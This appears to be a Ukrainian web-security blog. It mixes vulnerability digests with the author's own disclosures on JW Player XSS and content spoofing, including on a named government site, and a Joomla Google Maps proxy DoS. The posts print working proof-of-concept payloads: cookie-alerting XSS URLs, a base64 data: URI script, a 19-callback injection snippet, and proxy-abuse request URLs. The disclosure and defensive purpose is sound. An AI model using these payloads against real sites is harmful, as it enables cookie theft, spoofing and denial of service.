Websecurity - Веб безпека

В даній добірці уразливості в веб додатках:

• Multiple vulnerabilities in McAfee ePO 4.6.6 (деталі)
• Local File Include in Nagios Looking Glass (деталі)
• vBulletin remote admin injection exploit (деталі)
• Multiple CSRF Horde Groupware Web mail Edition 5.1.2 (деталі)
• Re: Multiple vulnerabilities in McAfee ePO 4.6.6 (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах WordPress Themes, Amplus та Pretty Photo. Для котрих з’явилися експлоіти. WordPress Themes - це теми движка (Bordeaux, Bulteno, Oxygen, Radial, Rayoflight, Reganto і Rockstar), Amplus - це тема движка, Pretty Photo - це плагін для створення фото галереї.

• WordPress Themes Remote File Upload (деталі)
• WordPress Amplus Cross Site Request Forgery (деталі)
• WordPress Pretty Photo Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

13.11.2013

У жовтні, 27.10.2013, я знайшов Cross-Site Scripting та Content Spoofing уразливості в DSMS. Які я виявив на dsmsu.gov.ua. Про що найближчим часом повідомлю розробникам системи.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

15.02.2014

XSS (WASC-08):

http://site/templates/default/js/jwplayer/player.swf?playerready=alert(document.cookie)
http://site/templates/default/js/jwplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg

XSS (WASC-08):

Якщо на сайті на сторінці з jwplayer.swf (player.swf) є можливість включити (через HTML Injection) JS код з калбек функцією, а таких функцій всього 19, то можна провести XSS атаку. Тобто JS-калбеки можна використати для XSS атаки.

<script type="text/javascript" src="jwplayer.js"></script>
<div id="container">...</div>
<script type="text/javascript">
jwplayer("container").setup({
flashplayer: "jwplayer.swf",
file: "1.flv",
autostart: true,
height: 300,
width: 480,
events: {
onReady: function() { alert(document.cookie); },
onComplete: function() { alert(document.cookie); },
onBufferChange: function() { alert(document.cookie); },
onBufferFull: function() { alert(document.cookie); },
onError: function() { alert(document.cookie); },
onFullscreen: function() { alert(document.cookie); },
onMeta: function() { alert(document.cookie); },
onMute: function() { alert(document.cookie); },
onPlaylist: function() { alert(document.cookie); },
onPlaylistItem: function() { alert(document.cookie); },
onResize: function() { alert(document.cookie); },
onBeforePlay: function() { alert(document.cookie); },
onPlay: function() { alert(document.cookie); },
onPause: function() { alert(document.cookie); },
onBuffer: function() { alert(document.cookie); },
onSeek: function() { alert(document.cookie); },
onIdle: function() { alert(document.cookie); },
onTime: function() { alert(document.cookie); },
onVolume: function() { alert(document.cookie); }
}
});
</script>

Content Spoofing (WASC-12):

http://site/templates/default/js/jwplayer/player.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/templates/default/js/jwplayer/player.swf?file=1.flv&image=1.jpg
http://site/templates/default/js/jwplayer/player.swf?config=1.xml
http://site/templates/default/js/jwplayer/player.swf?playlistfile=1.rss
http://site/templates/default/js/jwplayer/player.swf?playlistfile=1.rss&playlist.position=right&playlist.size=200

В системі є й інші дірки, про які я повідомив розробникам. Дані уразливості досі не виправлені.

В даній добірці уразливості в веб додатках:

• Command Injection via CSRF on DD-WRT v24-sp2 (деталі)
• Blind SQL Injection in Ops View (деталі)
• Multilple Cross Site Scripting (XSS) Attacks in Ops View (деталі)
• ILIAS eLearning 4.3.4 & 4.4 CMS - Persistent Notes Web Vulnerability (деталі)
• Exploit Tool Targets Vulnerabilities in McAfee ePolicy Orchestrator (ePO) (деталі)

30.10.2013

У жовтні, 27.10.2013, я знайшов Cross-Site Scripting та Content Spoofing уразливості на сайті Держмолодьспорту - http://dsmsu.gov.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно державних сайтів в останнє я писав про уразливості на nrcu.gov.ua та www.bank.gov.ua.

Детальна інформація про уразливості з’явиться пізніше.

14.02.2014

Уразливості в JW Player я описав в попередні роки.

XSS:

http://dsmsu.gov.ua/templates/default/js/jwplayer/player.swf?playerready=alert(document.cookie)
http://dsmsu.gov.ua/templates/default/js/jwplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg

Та інші XSS уразливості в JW Player.

Content Spoofing:

http://dsmsu.gov.ua/templates/default/js/jwplayer/player.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://dsmsu.gov.ua/templates/default/js/jwplayer/player.swf?file=1.flv&image=1.jpg

Та інші CS уразливості в JW Player.

На сайті є й інші дірки, про які я повідомив адмінам та розробникам движка, що розробляли сайт. Дані уразливості досі не виправлені.

В даній добірці уразливості в веб додатках:

• Zoom X4/X5 ADSL Modem and Router - Unauthenticated Remote Root Command Execution (деталі)
• LiveZilla 5.1.0.0 Reflected XSS in translations (деталі)
• Apache Struts 2.3.15.3 GA release available - security fix (деталі)
• Onpub CMS 1.4 & 1.5 - Multiple SQL Injection Vulnerabilities (деталі)
• RSA SecurID Sensitive Information Disclosure Vulnerability (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Highlight Premium Theme, Make A Statement та Tweet Blender. Для котрих з’явилися експлоіти. Highlight Premium Theme - це тема движка, Make A Statement - це тема движка, Tweet Blender - це плагін для розміщення на сайті повідомлень з Twitter.

• WordPress Highlight Premium Theme CSRF / Shell Upload (деталі)
• WordPress Make A Statement Cross Site Request Forgery (деталі)
• WordPress Tweet Blender 4.0.1 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

У грудні, 31.12.2013, я виявив численні уразливості в плагіні VideoWhisper Live Streaming Integration для WordPress. Це Cross-Site Scripting та Code Execution через Arbitrary File Uploading. Про що найближчим часом повідомлю розробникам веб додатку.

Стосовно плагінів для WordPress раніше я писав про уразливості в Contact Form 7 для WordPress.

Детальна інформація про уразливості з’явиться пізніше.

В даній добірці уразливості в веб додатках:

• HP StoreOnce D2D Backup System, Remote Unauthorized Access and Modification (деталі)
• Critical vulnerabilities discovered in Gazelle and TBDEV.net (деталі)
• openSIS <= 5.2 (ajax.php) PHP Code Injection Vulnerability (деталі)
• Opencart Multiple Vulnerabilities (деталі)
• Re: HP StoreOnce D2D Backup System, Remote Unauthorized Access and Modification (деталі)

У січні, 01.01.2014, я знайшов Denial of Service та Insufficient Anti-automation уразливості в Google Maps плагіні для Joomla. Про що найближчим часом повідомлю розробникам веб додатку.

Раніше я вже писав про DoS і XSS уразливості в Googlemaps для Joomla. Розробник виправив численні уразливості, про які я повідомив його торік. Але, як я перевірив, в плагіні є нові уразливості.

Denial of Service (WASC-10):

Уразливість наявна у захисному фільтрі плагіна. Можна проводити атаки на цільові сайти, де в якості піддомену використовується домен сайту з плагіном Google Maps.

Для старих версій плагіна використовувається plugin_googlemap2_proxy.php, а для нових використовувається plugin_googlemap3_kmlprxy.php. Наприклад, запит для атаки на сайт wordpress.com через скрипт на сайті site:

http://site/plugins/system/plugin_googlemap2_proxy.php?url=site.wordpress.com
http://site/plugins/system/plugin_googlemap3/plugin_googlemap3_kmlprxy.php?url=site.wordpress.com

Це необхідно для обходу захисного фільтру, якщо він увімкнений. Таким чином можна атакувати сайти, що дозволяють довільні піддомени.

Insufficient Anti-automation (WASC-21):

Як я писав раніше, у версії 3.2 плагіна розробник зробив захист від автоматизований атак, але він не ефективний. І використання вищезгаданої перевірки на домен, яка може бути обійдена, не вирішує ситуації.

В даному функціоналі плагіна немає надійного захисту від автоматизованих запитів. Для обходу захисту для доступу до скрипта потрібно вказати реферер (що рівний поточному сайту), кукіс (сесійний, що встановлюється Джумлою) і токена (що береться зі сторінки сайта з плагіном і встановлюється в URL). Ці дані можуть бути взяті з сайту автоматично.

Уразливі Google Maps plugin v3.2 для Joomla та попередні версії. За виключенням версій 2.19, 2.20, 3.1 де вимкнений функціонал проксі.